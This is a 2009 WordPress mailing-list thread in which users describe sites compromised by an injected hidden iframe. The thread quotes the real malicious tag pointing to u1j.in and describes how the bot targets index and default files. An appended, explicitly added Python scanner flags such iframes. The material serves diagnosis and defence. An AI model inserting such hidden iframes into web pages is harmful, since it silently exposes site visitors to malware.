Change your pwds and scan away. I used cPanel file manager for a while to make sure they stopped attacking. Looking at logs, it hits and is tagged with Googlebot, but the IPs are strange.

Anyway, this virus looks for files with:

index*.*
default*.*
main*.*
home*.*

(I built a static PHP includes site, and only files named like the above were affected.)

Also might want to check your CGI-BIN for files that look suspicious.

It's basically a bot that logs in, finds any files in all directories that start with the above... funny thing was that sometimes where they inject it, PHP code throws errors. They need to revise their bot to work outside the <? tags :)

-Chris
314media.com

On Thu, Jul 23, 2009 at 4:19 PM, Navjot Singh <[email protected]> wrote:
> Yeah.. my Wordpress mu install also got hacked. Just confirmed.
>
> On Fri, Jul 24, 2009 at 2:48 AM, dinu <[email protected]> wrote:
> > I had to restore from backup. The entire blog.
> > When I first saw Default.widgets.php hacked, I tried restoring only that page. But then I found hidden iframe codes on all of my pages (including pages after login).
> >
> > When I contacted Dreamhost support, they said it was an FTP hack. So, I would think it's not a Wordpress issue.
> >
> > On Fri, Jul 24, 2009 at 2:35 AM, Navjot Singh <[email protected]> wrote:
> >
> >> 2.8.1 at the time of being hacked. Just upgraded to 2.8.2
> >>
> >> On Fri, Jul 24, 2009 at 2:31 AM, Joshua Dunbar <[email protected]> wrote:
> >> > What version of Wordpress are you running?
> >> >
> >> > --------------------------------------------------
> >> > From: "Chris Carter" <[email protected]>
> >> > Sent: Thursday, July 23, 2009 3:43 PM
> >> > To: <[email protected]>
> >> > Cc: <[email protected]>; <[email protected]>
> >> > Subject: Re: [wp-testers] Default.widgets.php Hacked? What to do?
> >> >
> >> >> I keep getting hacked with that code inserted into admin/default-filters
> >> >>
> >> >> Chris Carter
> >> >> President
> >> >> 314media.com
> >> >> 314-714-5448
> >> >>
> >> >> On Jul 23, 2009, at 3:31 PM, Navjot Singh <[email protected]> wrote:
> >> >>
> >> >>> I have a blog running on 2.8.2 and suddenly now I find all index.php
> >> >>> and wp-includes/Default.widgets.php hacked with following code
> >> >>> inserted randomly:
> >> >>>
> >> >>> <iframe src="http://u1j.in:8080/ts/in.cgi?pepsi109" width=125
> >> >>> height=125 style="visibility: hidden"></iframe>
> >> >>>
> >> >>> How to prevent further hacking? I am currently replacing all the files
> >> >>> affected since all of them affected at a certain date. I am on a
> >> >>> shared hosting and only one blog got attacked.
> >> >>>
> >> >>> Regards
> >> >>> Navjot Singh
> >> >>> _______________________________________________
> >> >>> wp-testers mailing list
> >> >>> [email protected]
> >> >>> http://lists.automattic.com/mailman/listinfo/wp-testers
> >
> > --
> > With Love
> > Dinu
> >
> > http://chromestory.com
> > http://offlineblog.net
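
Added example, not part of the original thread or anyone's post: a small scanner that walks a web root and flags hidden iframes in files matching the name patterns listed above. The function names, the "hidden" heuristic (inline `visibility:hidden` or `display:none`) and the sample tag are assumptions made for this illustration.

```python
"""Flag hidden <iframe> tags in the file names the thread reports as targeted."""
import fnmatch
import os
import re
import sys

# Name patterns from the thread, matched case-insensitively because both
# index.php and Default.widgets.php were reported as modified.
TARGET_PATTERNS = ("index*.*", "default*.*", "main*.*", "home*.*")

IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE)
# Assumption: "hidden" means an inline style that makes the frame invisible.
HIDDEN_RE = re.compile(r"visibility\s*:\s*hidden|display\s*:\s*none", re.IGNORECASE)
SRC_RE = re.compile(r"""src\s*=\s*["']?([^"'\s>]+)""", re.IGNORECASE)

# Constructed sample, shaped like the injected tag quoted in the thread.
SAMPLE = ('<?php get_header(); ?>\n<iframe src="http://bad.example:8080/in.cgi?x" '
          'width=125 height=125 style="visibility: hidden"></iframe>\n')


def is_targeted(filename):
    name = filename.lower()
    return any(fnmatch.fnmatchcase(name, pat) for pat in TARGET_PATTERNS)


def find_hidden_iframes(text):
    """Return the src of every iframe tag styled to be invisible."""
    hits = []
    for tag in IFRAME_RE.findall(text):
        if HIDDEN_RE.search(tag):
            match = SRC_RE.search(tag)
            hits.append(match.group(1) if match else "")
    return hits


def scan_tree(root, only_targeted=True):
    """Walk root; return {relative_path: [iframe srcs]} for flagged files."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if only_targeted and not is_targeted(name):
                continue
            path = os.path.join(dirpath, name)
            with open(path, "r", encoding="utf-8", errors="replace") as fh:
                hits = find_hidden_iframes(fh.read())
            if hits:
                report[os.path.relpath(path, root)] = hits
    return report


if __name__ == "__main__":
    for path, srcs in sorted(scan_tree(sys.argv[1] if len(sys.argv) > 1 else ".").items()):
        print(path, "->", ", ".join(srcs))
```

Since one poster found the iframe on every page, `scan_tree(root, only_targeted=False)` sweeps all files rather than only the listed name patterns.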
